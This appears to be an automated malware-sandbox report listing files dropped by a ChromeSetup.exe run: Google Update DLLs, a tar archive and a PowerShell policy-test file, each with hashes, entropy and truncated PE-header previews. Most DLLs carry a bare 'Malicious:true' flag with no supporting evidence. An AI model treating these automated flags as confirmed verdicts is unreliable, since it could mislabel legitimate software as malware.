                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ......................................Z.....@.............................I....0..(....@...w.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....w...@...x..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ru.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43808
                                      Entropy (8bit):4.8159167593565515
                                      Encrypted:false
                                      SSDEEP:384:npoFA4ZUvHlzo4d2sToIYi6y2MtEAAM+o/8E9VF0Nyo:p3vHus1Yi6yvaAAMxkE
                                      MD5:6534FDFC9541218C0CC45450FF5CF322
                                      SHA1:E34F0094597907895DB8E5460A2177231C4E3C82
                                      SHA-256:08FB286A2823FEF7A25B8359BEEF81F6F1BA65DE7A9E76CA598612A981E3BC8E
                                      SHA-512:4C86EFBAB153EF7FD06F5283737F1859CF6F10DC3F64D36684AB0CD81D3EB5B2A7AC2FBE6C1EF2F21C3ECEB67694560894E162E57DFA1E177A64D67CD8537E52
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........|......h........ .......................................k....@.............................I....0..(....@...r.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....r...@...t..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sk.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.639739844002661
                                      Encrypted:false
                                      SSDEEP:384:mVJeUqha1iR6wLT6vIYi6ykB3pAM+o/8E9VF0NykNd:gJRgxRD6QYi6ycZAMxkEO
                                      MD5:59E7C6D09737F36D43DC66CF6550109B
                                      SHA1:4BDC91BA8FC182ED213345E49B2806918CC03712
                                      SHA-256:99C406740386846DE02FD0B8AF6D63B1B6DE586F0D3125846B904C8B2F35FFEF
                                      SHA-512:BBAC8E066927EFB40545E2D474DAD921DCA646407E2BB2360F6F7802E0CBFB71C4B60AE8ECA6C13B49CBE469141A301194CC43CB12464E1E826C56BA0A04E4CD
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ ............................................@.............................I....0..(....@...t.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....t...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sl.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44832
                                      Entropy (8bit):4.598618299189994
                                      Encrypted:false
                                      SSDEEP:384:oOkTvshVyiWQZpdpWBdd1imIXous8cIYi6yDygAM+o/8E9VF0NyaK:LsrQZpO14Zs8NYi6ybAMxkE
                                      MD5:10C0234687254950BB93F7C379C1DA49
                                      SHA1:45B21D2531CA4F8ED67767C3E813B3A5F51845D3
                                      SHA-256:0EAF7F8721F2B51D10FF36C1EF0BC7CD958B351A81A720E0B8908F93048FB88D
                                      SHA-512:1A6EA2CDC3B55618F8145BA957089F01C613E407797256FA540A7AC9723A216419463A07A0A99FDC62D827DCCC5F6290F84E79B21E810DED9F990331E422D70D
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ .......................................`....@.............................I....0..(....@...v.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....v...@...x..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sr.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.8146037455010395
                                      Encrypted:false
                                      SSDEEP:384:Z71rxgxLUjYFotGNxIYi6yNgzAM+o/8E9VF0NykR1Gz:h1IUjO4GNmYi6yazAMxkEuU
                                      MD5:66813FB0D3A66FC673133C288AA21F29
                                      SHA1:C934F77F2B4E8F8BE1D9A63497A7549E5F9E4A7B
                                      SHA-256:6A5459C40D0E8F8D7DCB3AA457D70BF3655F8B9F52121AB16ADFEBE56A8AAF73
                                      SHA-512:EE7F26F6734F8743AAFD7A41B647DD92330618F9014E88BDCB8FB3E1B90F7B6D6A3CF4DF22171D7ADD5DF0AF8196E8AD68C85BCB71A4D75F1E31061A52055FEA
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ ......................................4.....@.............................I....0..(....@..8u.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...8u...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sv.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.614670449990197
                                      Encrypted:false
                                      SSDEEP:384:nbrkxa77CEhE7wIYi6y/ZAM+o/8E9VF0Ny84:n/kxaCEhE7ZYi6yBAMxkE9
                                      MD5:54C3BD48650DDA24560A3F567929A876
                                      SHA1:53C6A27155EE329774D97B533210211A9946D607
                                      SHA-256:AB5CB8DA8269308EAF2A2C0CABACFD02F21787C08AC99C5380BD74A6307CE6A7
                                      SHA-512:009A1397BB13B0B4A2C540EEF4927C80754AD27A88E54A998732604A902C97594FAC3E46303224B90F5329168D3AA468610BE46B64F25833FA5E68A60F2BAA7A
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ ......................................,.....@.............................I....0..(....@...u.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....u...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sw.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45856
                                      Entropy (8bit):4.641351954013158
                                      Encrypted:false
                                      SSDEEP:384:eCwSgicgiN7upv4MZ7NIYi6yeI5nfAM+o/8E9VF0NyuY:ePSQx72v4MZ7aYi6yHnfAMxkEN
                                      MD5:E17047F1905DD4A7C54F6B7391A3A2B5
                                      SHA1:460E93C96B4605EA4EBB8CC3B5C98880B238B38E
                                      SHA-256:21D08E9FBC8D311096E48D0121B6E139308F008E588E9FBB2C044AD54D0C6FE3
                                      SHA-512:3A060C089A5A200EC38A275F44ECB02C56764EFA0860E4F2CE4362820265C9EF2A8E5B5FD94AAD6CE7E9FB619CC4AFD1BB477FBFB3EACFD5DC961D0A38FC552F
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ............................................@.............................I....0..(....@...z.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....z...@...|..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ta.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):46368
                                      Entropy (8bit):4.899032374348262
                                      Encrypted:false
                                      SSDEEP:384:wBrw8Y51ZLmE4r2pjIYi6yo/lAM+o/8E9VF0Nyb:krvY51ZLmE4r2pMYi6yMAMxkE
                                      MD5:2C0F7D4EE79FAE77026D5733989B43C7
                                      SHA1:FE9395690CD573794D40F04E16B828138BAFF120
                                      SHA-256:B61196B93E653DC3B6AB3CFB367218081A88A2DC21F678DEB79AD47DCAA2D573
                                      SHA-512:32DFCBAA68F8CD387DD7A05D056368382911D7EC80B22475D182912CD27FF3888A0865916B9D76D76777A24F16FACF54EE342D1A7F4AB3B87624DDA1E72A367A
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ......................................;.....@.............................I....0..(....@...|.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....|...@...~..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_te.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45856
                                      Entropy (8bit):4.851599264948585
                                      Encrypted:false
                                      SSDEEP:384:kUgaco45Z49fN1XnWuIYi6y/g/HAM+o/8E9VF0NyhQM:MacV5yFXXnWjYi6ymAMxkEv
                                      MD5:456E12D968E0E77270173EF937915C3C
                                      SHA1:0DAF03D2C505467FDEC7B5BDFBE3699554892164
                                      SHA-256:C5C9AC04B400B67C6CFDF2EE9C21901DF239A00CABD402E59AF0A00D4EFB0173
                                      SHA-512:AA3A63145EE88D266E8B57202D01E934AA79B14C6CFF6DC1381B1C526A3F890EF6EA2917DA7AF1ACDD04785341B025FEA3709E636C9D36745E644CC2ABF5A1E7
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ .......................................,....@.............................I....0..(....@..8z.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...8z...@...|..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_th.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43296
                                      Entropy (8bit):4.846117586396544
                                      Encrypted:false
                                      SSDEEP:384:5FNrnrrGsMKt8hetnOfIYi6y7HoEAM+o/8E9VF0NyDR:lnrrGszt8hetnOgYi6ybAMxkE
                                      MD5:21E645B6564A4BFF088ABCDB94F7B4BA
                                      SHA1:DB9966EA497A9C5532172F8CB70D037FE2DAA13C
                                      SHA-256:08E643F88D1DF3F681824923EEA75F7DDDEE55D6AB62DCEB5A812C05CE8C753D
                                      SHA-512:81D7B60B211230C9AF1CF4B016E80092E3E765CB40E775992C850495CE8E4F9886F190A507650F26F092A468533FEC03B01AC3837D94282E75380602B9DB5E78
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........z......h........ .......................................8....@.............................I....0..(....@...p.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....p...@...r..................@..@.reloc.. ............~..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_tr.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.654307955240313
                                      Encrypted:false
                                      SSDEEP:768:8mp9FRqnk6qXQEdmvgNPTEw+G9Ahrxe+BzQSXGPYi6yF7AMxkEAU:8mtA6hdmvATEwSxrQKW7lxf
                                      MD5:E05348222EBC21D3D1B4AED180A62566
                                      SHA1:851394AE7D9C9FB85979B7D0F660A415004DEF0A
                                      SHA-256:531415CBE8C0753227934E926446872416E1593BD653826AA29BEA9E6F5AC668
                                      SHA-512:055A1AE42F5CD9229884EFBEA235085326B1B8904C4C28C5096430BC528A19AC29D450740A76D5C2BFD69D67A7E78958343FBAAB575B80AC495B3E373EF26502
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ .......................................>....@.............................I....0..(....@...u.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....u...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_uk.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.81325112433323
                                      Encrypted:false
                                      SSDEEP:384:MVrwKgHxyC2secvVJE/GfuyQIYi6ynB9B6eAM+o/8E9VF0Nye/R8:QrwVuy5Yi6yXEeAMxkEei
                                      MD5:AF3F42CBB576430DDD211C4A1FA1D5A9
                                      SHA1:69149B4A0EE61C2250BD1A758FA7AA7C281A6178
                                      SHA-256:4D72AAD9545AB5EB6A89E3690675ABF9007CAA376D9DA6B0C8CB5C704BA9407D
                                      SHA-512:903007FF6E99201D38CF4B9ECC54DF9F1DE67DC58CBCC6277CEDE1BE2FE8EBB508D6A37DD4FD98D64E9A2616625544AE1302DAF335C2454C4A56C7CB4D18DD1A
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ ......................................~.....@.............................I....0..(....@...t.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....t...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ur.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.800433810371665
                                      Encrypted:false
                                      SSDEEP:384:TVEq9zmAco2u9keeZyYGm9IYi6yud4LlAM+o/8E9VF0NyhGa:ZEq9zmAco2AkeesYNqYi6yqclAMxkEWa
                                      MD5:3C9DA7F71844BEB6DD85F8D77172B908
                                      SHA1:D54CA9CD4187DD7C165F549E34ED577F6B4B8315
                                      SHA-256:5C95D80D684E8A886DFBBCFB54F2EF4AD6C26FF0E17C6CCFEC2D8373BBC32A18
                                      SHA-512:CCD2B2EB17A25C95E8596600CDC629EE26780D014788DB8A526DF058832AFF7EBB2BB3273E5C0C9642D5949E78AE5A9F89640AA3C8807FA106338B459C9EBCD1
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ .......................................z....@.............................I....0..(....@..0t.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...0t...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_vi.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43808
                                      Entropy (8bit):4.715476850485692
                                      Encrypted:false
                                      SSDEEP:384:xw9MXlJncBzIYi6ydFsLAM+o/8E9VF0NyHfAvOv:29MX3cB8Yi6yfuAMxkECi
                                      MD5:154B7A3DC9AE005E0D502E2D02B3473D
                                      SHA1:03EE0B94992A6EDCE78ABACE71C9F4EFEAFB7C97
                                      SHA-256:A9D43AE666670ECD93A16E131F402EC40067E44657A0BBC5136B152AD4706804
                                      SHA-512:823246ACB4205A60610B5FC09F54F758A70BC1596E118E323A1FA5092621094145CD5EA75A22CDDB944BDD7CD3A93D87B88EA887B1455EBF028EB6B9D0C1FC13
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........|......h........ ............................................@.............................I....0..(....@..0s.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...0s...@...t..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-CN.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):38176
                                      Entropy (8bit):4.778670861598811
                                      Encrypted:false
                                      SSDEEP:384:C1s5s9AoB2HIYi6y6KOpAM+o/8E9VF0NyB:i7AoB2oYi6yQAMxkE
                                      MD5:3238536195C72141BF60EE15CE6413DD
                                      SHA1:5D89916A8F72B9836E3E2E1EB93077B515A231E9
                                      SHA-256:5C0E33D4CBDA0D878A48C51A7286E6CE3884EF0AA06CE4FC306B888D3E8F07F4
                                      SHA-512:78FCC97DB95B720E1CE7FA24EC9820D784A8013F791837629021176F8AE416775ED8A25B3AFBCE33FC18B29DE5375F3EA2818A5A345BA0AD87BC71DFB72CBE0C
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........f......h........ ............................................@.............................L....0..(....@...\...........l.. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....\...@...^..................@..@.reloc.. ............j..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-TW.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):38176
                                      Entropy (8bit):4.793797453530872
                                      Encrypted:false
                                      SSDEEP:384:Z8dw29Gx/PhIYi6y8mAM+o/8E9VF0Nyy2ay:adwx/P2Yi6y5AMxkEJj
                                      MD5:64674D06CA9F8888A62B75DF12950CC2
                                      SHA1:4518365CE4270295271F6DFDE6ED452E0F67B855
                                      SHA-256:2B6AE6A1B6F89EE717ACB32EF44D229D7CF4CA24DC383D4A078F004B3434662B
                                      SHA-512:0824ECF6DA9F1A822AB646E47454442B13365F2A45792DCE5E68269D9D31CA32315CFCA11447FFAE1F17293231896DB36BFD35FDE6A644E674AD247F0AED9887
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........f......h........ ......................................B.....@.............................L....0..(....@..0]...........l.. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...0]...@...^..................@..@.reloc.. ............j..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\psmachine.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):278816
                                      Entropy (8bit):6.535975870555865
                                      Encrypted:false
                                      SSDEEP:6144:jRyuVhSBeXTIxjqJ64G6peRXpmAOcou9jtwQrHQc/mw3Ia:j8qhSBeX2jqJ6FvXpmmou9pwtovIa
                                      MD5:CDE140B706BB57F83D1AFE5C5B8EC346
                                      SHA1:44A286784BB6C8D8D66FF25FF8A502D06DB9BADA
                                      SHA-256:5A0C4B1BF6A52B2380803B3E2494DD37A221B68E5302B5AB7FF9C27D85398649
                                      SHA-512:414B7C24FEB8690B34EF80D53C03474BA7979EE7CD4D2F78AB9B26CD3B9669F20326E35AFD57C9954DC0BD2A8E25309FD1D00B7E0E3925C0E9F2351A1E0E414A
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........xV........................g...r.......r.......r...........................h..........................................Rich............................PE..L...)..e...........!.....*...................P...............................p......J%....@..........................r.......r...........h.............. )...@...-...b..T............................b..@............P..h............................text....'.......(.................. ..`.orpc...c....@.......,.............. ..`.rdata...6...P...6..................@..@.data...85...........d..............@....rsrc....h.......j..................@..@.reloc...-...@......................@..B........................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\psmachine_64.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):355616
                                      Entropy (8bit):6.162519927894666
                                      Encrypted:false
                                      SSDEEP:6144:UuUZ+wSATioVOG31+aOEyxTM+d9+ohtbAcqARwytQc/mw:UbBSATioVR31+2ynD+oYcfwHo
                                      MD5:B002F5315B6EB8801A91756643A15C1B
                                      SHA1:BD14CB9D3808873888921DC893CA1CF48546676C
                                      SHA-256:0A9C8F037925570FFE1D36E19E194B7D67346306C93296745AE4FE7002F02D3E
                                      SHA-512:63F6F83F5BE656BD6F17CDF31AB4D8158E55E50BB3D72B4DF2FE08B132F166CE446B5C25A8A1860CE72DF1568AF71EE32B898A861FF99EDF09A5666A813C962A
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?_.g{>.4{>.4{>.4.L.5.>.4.L.5w>.4.T.5[>.4.T.5r>.4.T.5G>.4.L.5l>.4.L.5f>.4{>.4.?.4.U.5H>.4.U.5z>.4.U 4z>.4{>H4z>.4.U.5z>.4Rich{>.4........................PE..d...+..e.........." .................9..............................................&.....`......................................... ^.......^.......P...h.......$...D.. )......$....8..T............................9...............................................text............................... ..`.orpc...$........................... ..`.rdata..V...........................@..@.data...|P.......*...X..............@....pdata...$.......&..................@..@_RDATA..............................@..@.gxfg...0.... ......................@..@.gehcont.....@......................@..@.rsrc....h...P...j..................@..@.reloc..$............,..............@..B........................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\psuser.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):278816
                                      Entropy (8bit):6.535584786524981
                                      Encrypted:false
                                      SSDEEP:6144:sRyuVhSBeXTIxjqJ64G6peRXpmAOPfu0RtwQrHQc/mw3Ia:s8qhSBeX2jqJ6FvXpmVfu0bwtovIa
                                      MD5:D7770594FA82330B50573FDD8A2CCF3D
                                      SHA1:5A64FA8671AB64A2E974637917B987D001B4EDAF
                                      SHA-256:350339ACF9B3CA3055823C67AB568390D54C35DA4692E33C3A7E62FBC7C4B9A9
                                      SHA-512:CC2D672F15C5674B2DE8024E204D533EF9347DD635633074BF8C38A96209355B5A10D14706677060B01D5E329FC465259E8996587A0A2EA7F2FF7C7B5DBDD64A
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........xV........................g...r.......r.......r...........................h..........................................Rich............................PE..L...;..e...........!.....*...................P...............................p......4.....@..........................r.......r...........h.............. )...@...-...b..T............................b..@............P..h............................text....'.......(.................. ..`.orpc...c....@.......,.............. ..`.rdata...6...P...6..................@..@.data...85...........d..............@....rsrc....h.......j..................@..@.reloc...-...@......................@..B........................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\psuser_64.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):355616
                                      Entropy (8bit):6.161744248585241
                                      Encrypted:false
                                      SSDEEP:6144:5uU5uwSATioVOG31+aOEyxTM+d9eoh0bLc+ORwynlQc/mwu:5bRSATioVR31+2ynDeoScRwi+om
                                      MD5:458F24A910A1022B5DB6219E7A838CE5
                                      SHA1:DCA5EEF5567B54F8FD4BA11E40D766E4C1BB30B3
                                      SHA-256:E0D786B4823F4D4137A2110A2E867237ABC5BC29604A55D6A172199E56CE3BE7
                                      SHA-512:4D373720EB6BB4B901E250CF4DB778BE10F4FF4A260D62112DBF5E28F139C1C1C26B5B7268B7B3167E83E74BDF3BF6CC44C518127AFE1B26EFD5E874D2865B99
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?_.g{>.4{>.4{>.4.L.5.>.4.L.5w>.4.T.5[>.4.T.5r>.4.T.5G>.4.L.5l>.4.L.5f>.4{>.4.?.4.U.5H>.4.U.5z>.4.U 4z>.4{>H4z>.4.U.5z>.4Rich{>.4........................PE..d...K..e.........." .................9....................................................`..........................................^.......^.......P...h.......$...D.. )......$....8..T............................9...............................................text............................... ..`.orpc...$........................... ..`.rdata..F...........................@..@.data...|P.......*...X..............@....pdata...$.......&..................@..@_RDATA..............................@..@.gxfg...0.... ......................@..@.gehcont.....@......................@..@.rsrc....h...P...j..................@..@.reloc..$............,..............@..B........................................................

                                      C:\Windows\SystemTemp\GUTBC13.tmp

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:POSIX tar archive (GNU)
                                      Category:dropped
                                      Size (bytes):7290880
                                      Entropy (8bit):6.34667990473666
                                      Encrypted:false
                                      SSDEEP:98304:nKkEfg+g+GebMgllbcv3gjmGFbAoN8sJ6NpujeP8sJ6NpFje/iJ+mRUcf:BOg6MlRQZtjNjIgSc
                                      MD5:54140E1D25D47A927A96C71C946B7FED
                                      SHA1:77B5214D74D2E509B0A972B7B6EF92FC419491AC
                                      SHA-256:8D43014F9D44049E1742CBEB70DDDAEE63CA5D09DD73E47997421B41E9CE4B9F
                                      SHA-512:C0D79CBA16465A3DDE50BF3D28910040F8F3A70EFAA2F074E1F4CC9D5A735BE167F9116DE2B5FDD9B15C8315503F61FC6C1B1E9A66484ACB72827D164BB37BE0
                                      Malicious:false
                                      Preview:GoogleUpdate.exe....................................................................................0000777.0000000.0000000.00000474440.14547375663.012336. 0....................................................................................................ustar .................................................................0000000.0000000........................................................................................................................................................................MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L......e.................D..........Ru.......`....@.......................................@.................................P...x....... ............P.. )..........p[..T............................[..@...............L...........

                                      C:\Windows\Temp\__PSScriptPolicyTest_djfjjprx.ib4.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
